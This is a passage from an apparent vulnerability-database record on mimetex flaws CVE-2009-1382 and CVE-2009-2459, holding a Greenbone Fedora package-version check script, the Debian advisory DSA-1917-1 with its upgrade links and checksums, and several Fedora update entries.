value:\"2010-04-16 17:02:11 +0200 (Fri, 16 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-6546\");\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_name(\"Fedora Update for mimetex FEDORA-2010-6546\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mimetex\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"mimetex\", rpm:\"mimetex~1.71~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-10-09T00:59:19", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1917-1 security@debian.org\nhttp://www.debian.org/security/ Giuseppe Iuculano\nOctober 24, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : mimetex\nVulnerability : several vulnerabilities\nProblem type : remote (local)\nDebian-specific: no\nDebian bug : 537254\nCVE Ids : CVE-2009-1382 CVE-2009-2459\n\n\nSeveral vulnerabilities have been discovered in mimetex, a lightweight\nalternative to MathML. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2009-1382\n\nChris Evans and Damien Miller, discovered multiple stack-based buffer overflow.\nAn attacker could execute arbitrary code via a TeX file with long picture,\ncircle, input tags.\n\nCVE-2009-2459\n\nChris Evans discovered that mimeTeX contained certain directives that may be\nunsuitable for handling untrusted user input. A remote attacker can obtain\nsensitive information.\n\n\nFor the oldstable distribution (etch), these problems have been fixed in\nversion 1.50-1+etch1.\n\nDue to a bug in the archive system, the fix for the stable distribution\n(lenny) will be released as version 1.50-1+lenny1 once it is available.\n\nFor the testing distribution (squeeze), and the unstable distribution (sid),\nthese problems have been fixed in version 1.50-1.1.\n\n\nWe recommend that you upgrade your mimetex packages.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (oldstable)\n- ------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/m/mimetex/mimetex_1.50-1+etch1.dsc\n Size/MD5 checksum: 584 4c4ac225a147438ea1bb7be1b0f65019\n http://security.debian.org/pool/updates/main/m/mimetex/mimetex_1.50-1+etch1.diff.gz\n Size/MD5 checksum: 5318 5d3a2a06fecf83d573c8cbb9c778ddf0\n http://security.debian.org/pool/updates/main/m/mimetex/mimetex_1.50.orig.tar.gz\n Size/MD5 checksum: 401817 cdda954fc3a436daa8345ecbfdb084c3\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/m/mimetex/mimetex_1.50-1+etch1_alpha.deb\n Size/MD5 checksum: 154406 b525a79c4c6e92ebe5d6853261edb7d9\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/m/mimetex/mimetex_1.50-1+etch1_amd64.deb\n Size/MD5 checksum: 151848 b01a4cf79985dbc98aa468b27355c005\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/m/mimetex/mimetex_1.50-1+etch1_arm.deb\n Size/MD5 checksum: 150546 8041ce35d9d2457999e217bd9ecff233\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/m/mimetex/mimetex_1.50-1+etch1_hppa.deb\n Size/MD5 checksum: 148156 0f7d099d12f46f9c74a9d4863cacb676\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/m/mimetex/mimetex_1.50-1+etch1_i386.deb\n Size/MD5 checksum: 143668 55db42c430e79ebd525679d72c8556f8\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/m/mimetex/mimetex_1.50-1+etch1_ia64.deb\n Size/MD5 checksum: 188604 5f4c8c896998e82797bba6a0997d550c\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/m/mimetex/mimetex_1.50-1+etch1_mips.deb\n Size/MD5 checksum: 155176 c080d72fef8acd63fa27b0a5cf7688bd\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/m/mimetex/mimetex_1.50-1+etch1_mipsel.deb\n Size/MD5 checksum: 156068 96a3663cab62464f23ea747f679fbb57\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/m/mimetex/mimetex_1.50-1+etch1_powerpc.deb\n Size/MD5 checksum: 145470 84ec68d2dcf0378f634f7cdc48c272d2\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/m/mimetex/mimetex_1.50-1+etch1_s390.deb\n Size/MD5 checksum: 157512 493034d85d335c5c48358aac4fa5365f\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/m/mimetex/mimetex_1.50-1+etch1_sparc.deb\n Size/MD5 checksum: 146950 657d93204c670f44c337d85b5fa9a67b\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 8, "modified": "2009-10-24T00:19:25", "published": "2009-10-24T00:19:25", "id": "DEBIAN:DSA-1917-1:5C54B", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00240.html", "title": "[SECURITY] [DSA 1917-1] New mimetex packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "MimeTeX lets you easily embed LaTeX math in your html pages. It parses a La TeX math expression and immediately emits the corresponding gif image, rather t han the usual TeX dvi. And mimeTeX is an entirely separate little program that doesn't use TeX or its fonts in any way. ", "modified": "2013-03-23T23:59:24", "published": "2013-03-23T23:59:24", "id": "FEDORA:547DC217DA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: mimetex-1.74-1.fc18", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "MimeTeX lets you easily embed LaTeX math in your html pages. It parses a La TeX math expression and immediately emits the corresponding gif image, rather t han the usual TeX dvi. And mimeTeX is an entirely separate little program that doesn't use TeX or its fonts in any way. ", "modified": "2009-11-04T12:21:53", "published": "2009-11-04T12:21:53", "id": "FEDORA:698DF10F83E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: mimetex-1.71-1.fc10", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "MimeTeX lets you easily embed LaTeX math in your html pages. It parses a La TeX math expression and immediately emits the corresponding gif image, rather t han the usual TeX dvi. And mimeTeX is an entirely separate little program that doesn't use TeX or its fonts in any way. ", "modified": "2013-03-24T00:03:51", "published": "2013-03-24T00:03:51", "id": "FEDORA:F282D20DEE", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: mimetex-1.74-1.fc17", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "MimeTeX lets you easily embed LaTeX math in your html pages. It parses a La TeX math expression and immediately emits the corresponding gif image, rather t han the usual TeX dvi. And mimeTeX is an entirely separate little program that doesn't use TeX or its fonts in any way. ", "modified": "2009-11-04T12:37:53", "published": "2009-11-04T12:37:53", "id": "FEDORA:052A910F882", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: mimetex-1.71-1.fc11", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "MimeTeX lets you easily embed LaTeX math in your html pages. It parses a La TeX math expression and immediately emits the corresponding gif image, rather t han the usual TeX dvi. And mimeTeX is an entirely separate little program that doesn't use TeX or its fonts in any way. ", "modified": "2010-04-14T01:35:36", "published": "2010-04-14T01:35:36", "id": "FEDORA:F3668110BA2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: mimetex-1.71-1.fc12", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
